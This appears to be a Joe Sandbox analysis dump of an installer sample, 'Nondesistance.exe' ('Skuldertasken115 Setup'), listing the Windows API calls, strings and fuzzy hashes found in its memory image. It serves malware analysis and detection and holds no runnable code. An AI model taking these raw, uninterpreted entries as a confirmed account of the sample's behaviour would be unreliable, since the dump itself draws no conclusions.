                                                                                                  • Instruction ID: b54bb08643918bb8896a5862ce8d2e5c56cc7996104e834ef2f2724ba304e424
                                                                                                  • Opcode Fuzzy Hash: 748cd7fe1685eb5367add993e96662fd24b39d6897b161640e6c14adf6400025
                                                                                                  • Instruction Fuzzy Hash: A5E0E57BB182405FEB21DB64AD9086D7BA29B95310795017BD101A7591C2789C09C728
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                    • Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                                    • Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
                                                                                                    • Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 2547128583-0
                                                                                                  • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                  • Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
                                                                                                  • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                  • Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669
                                                                                                  APIs
                                                                                                  • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Nondesistance.exe,80000000,00000003), ref: 004059A6
                                                                                                  • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesCreate
                                                                                                  • String ID:
                                                                                                  • API String ID: 415043291-0
                                                                                                  • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                                  • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                                                  • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                                  • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                                                  APIs
                                                                                                  • GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
                                                                                                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405996
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  APIs
                                                                                                  • CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
                                                                                                  • GetLastError.KERNEL32 ref: 0040549F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1375471231-0
                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNELBASE(00000000), ref: 100028A7
                                                                                                  • GetLastError.KERNEL32 ref: 100029AE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20224243573.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: AllocErrorLastVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 497505419-0
                                                                                                  APIs
                                                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfileStringWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 390214022-0
                                                                                                  APIs
                                                                                                  • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: PathSearch
                                                                                                  • String ID:
                                                                                                  • API String ID: 2203818243-0
                                                                                                  APIs
                                                                                                  • RegOpenKeyExA.KERNELBASE(00000000,000000C1,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Open
                                                                                                  • String ID:
                                                                                                  • API String ID: 71445658-0
                                                                                                  APIs
                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3934441357-0
                                                                                                  APIs
                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2738559852-0
                                                                                                  APIs
                                                                                                  • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20224243573.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: ProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 544645111-0
                                                                                                  APIs
                                                                                                  • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022FA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfileString
                                                                                                  • String ID:
                                                                                                  • API String ID: 1096422788-0
                                                                                                  APIs
                                                                                                  • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  APIs
                                                                                                  • SendMessageA.USER32(000103E4,00000000,00000000,00000000), ref: 00403F72
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 3850602802-0
                                                                                                  APIs
                                                                                                  • SendMessageA.USER32(00000028,?,?,00403D7A), ref: 00403F57
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 3850602802-0
                                                                                                  APIs
                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FilePointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 973152223-0
                                                                                                  APIs
                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00403D13), ref: 00403F40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 2492992576-0
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 3472027048-0
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 004048DD
                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 004048E8
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
                                                                                                  • LoadBitmapA.USER32(0000006E), ref: 00404945
                                                                                                  • SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
                                                                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
                                                                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
                                                                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
                                                                                                  • DeleteObject.GDI32(00000000), ref: 004049BB
                                                                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
                                                                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
                                                                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
                                                                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404B14
                                                                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
                                                                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
                                                                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
                                                                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
                                                                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
                                                                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 00404CE4
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00404CF4
                                                                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
                                                                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
                                                                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
                                                                                                  • InvalidateRect.USER32(?,00000000,?), ref: 00404E45
                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00404E93
                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404E9E
                                                                                                  • ShowWindow.USER32(00000000), ref: 00404EA5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                  • String ID: $M$N
                                                                                                  • API String ID: 1638840714-813528018
                                                                                                  • Opcode ID: a67c8009aead4ab382489a98003fcdb5c23a57fc16a1888bff0d18b8c213c962
                                                                                                  • Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
                                                                                                  • Opcode Fuzzy Hash: a67c8009aead4ab382489a98003fcdb5c23a57fc16a1888bff0d18b8c213c962
                                                                                                  • Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 004043A1
                                                                                                  • SetWindowTextA.USER32(00000000,?), ref: 004043CB
                                                                                                  • SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404487
                                                                                                  • lstrcmpiA.KERNEL32(Call,Skuldertasken115 Setup: Installing), ref: 004044B9
                                                                                                  • lstrcatA.KERNEL32(?,Call), ref: 004044C5
                                                                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7
                                                                                                    • Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
                                                                                                    • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Nondesistance.exe",77323410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                                    • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                                    • Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\Desktop\Nondesistance.exe",77323410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                                    • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00428838,?,?,0000040F,?,00428838,00428838,?,?,00428838,?,?,000003FB,?), ref: 00404595
                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
                                                                                                    • Part of subcall function 00404709: lstrlenA.KERNEL32(Skuldertasken115 Setup: Installing,Skuldertasken115 Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                                    • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
                                                                                                    • Part of subcall function 00404709: SetDlgItemTextA.USER32(?,Skuldertasken115 Setup: Installing), ref: 004047C2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                  • String ID: A$C:\Users\user\dewater\reinsmen$Call$Skuldertasken115 Setup: Installing
                                                                                                  • API String ID: 2624150263-842034559
                                                                                                  • Opcode ID: defccd4cb28be1bf432bf86436ffe94b5e4a3bffcd77409c4071bec9b813e0ba
                                                                                                  • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                                                                  • Opcode Fuzzy Hash: defccd4cb28be1bf432bf86436ffe94b5e4a3bffcd77409c4071bec9b813e0ba
                                                                                                  • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69
                                                                                                  APIs
                                                                                                  • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 004040E8
                                                                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
                                                                                                  • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 0040411A
                                                                                                  • GetSysColor.USER32(?), ref: 0040412B
                                                                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
                                                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040414C
                                                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
                                                                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 004041D2
                                                                                                  • SendMessageA.USER32(00000000), ref: 004041D5
                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404200
                                                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
                                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
                                                                                                  • SetCursor.USER32(00000000), ref: 00404258
                                                                                                  • ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,?), ref: 0040426B
                                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00404278
                                                                                                  • SetCursor.USER32(00000000), ref: 0040427B
                                                                                                  • SendMessageA.USER32(00000111,?,00000000), ref: 004042A7
                                                                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                  • String ID: (@@$Call$N$open
                                                                                                  • API String ID: 3615053054-2228552488
                                                                                                  • Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                                                  • Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
                                                                                                  • Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                                                  • Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
                                                                                                  APIs
                                                                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                  • DrawTextA.USER32(00000000,Skuldertasken115 Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                  • String ID: F$Skuldertasken115 Setup
                                                                                                  • API String ID: 941294808-2398837403
                                                                                                  APIs
                                                                                                  • lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,00405C0B,?,?), ref: 00405AAB
                                                                                                  • GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4
                                                                                                    • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                    • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                                                  • GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
                                                                                                  • wsprintfA.USER32 ref: 00405AEF
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
                                                                                                  • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405BD8
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
                                                                                                    • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Nondesistance.exe,80000000,00000003), ref: 004059A6
                                                                                                    • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                  • String ID: %s=%s$NUL$[Rename]
                                                                                                  • API String ID: 222337774-4148678300
                                                                                                  APIs
                                                                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Nondesistance.exe",77323410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                                  • CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\Nondesistance.exe",77323410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                                  • CharPrevA.USER32(?,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                                  Strings
                                                                                                  • "C:\Users\user\Desktop\Nondesistance.exe", xrefs: 00405FD6
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
                                                                                                  • *?|<>/":, xrefs: 00405FE2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Char$Next$Prev
                                                                                                  • String ID: "C:\Users\user\Desktop\Nondesistance.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 589700163-2780203020
                                                                                                  APIs
                                                                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402B9A
                                                                                                  • MulDiv.KERNEL32(000D5275,00000064,000D68D8), ref: 00402BC5
                                                                                                  • wsprintfA.USER32 ref: 00402BD5
                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                  • String ID: uR$verifying installer: %d%%
                                                                                                  • API String ID: 1451636040-3922335905
                                                                                                  APIs
                                                                                                  • GetWindowLongA.USER32(?,000000EB), ref: 00403F98
                                                                                                  • GetSysColor.USER32(00000000), ref: 00403FB4
                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00403FC0
                                                                                                  • SetBkMode.GDI32(?,?), ref: 00403FCC
                                                                                                  • GetSysColor.USER32(?), ref: 00403FDF
                                                                                                  • SetBkColor.GDI32(?,?), ref: 00403FEF
                                                                                                  • DeleteObject.GDI32(?), ref: 00404009
                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00404013
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
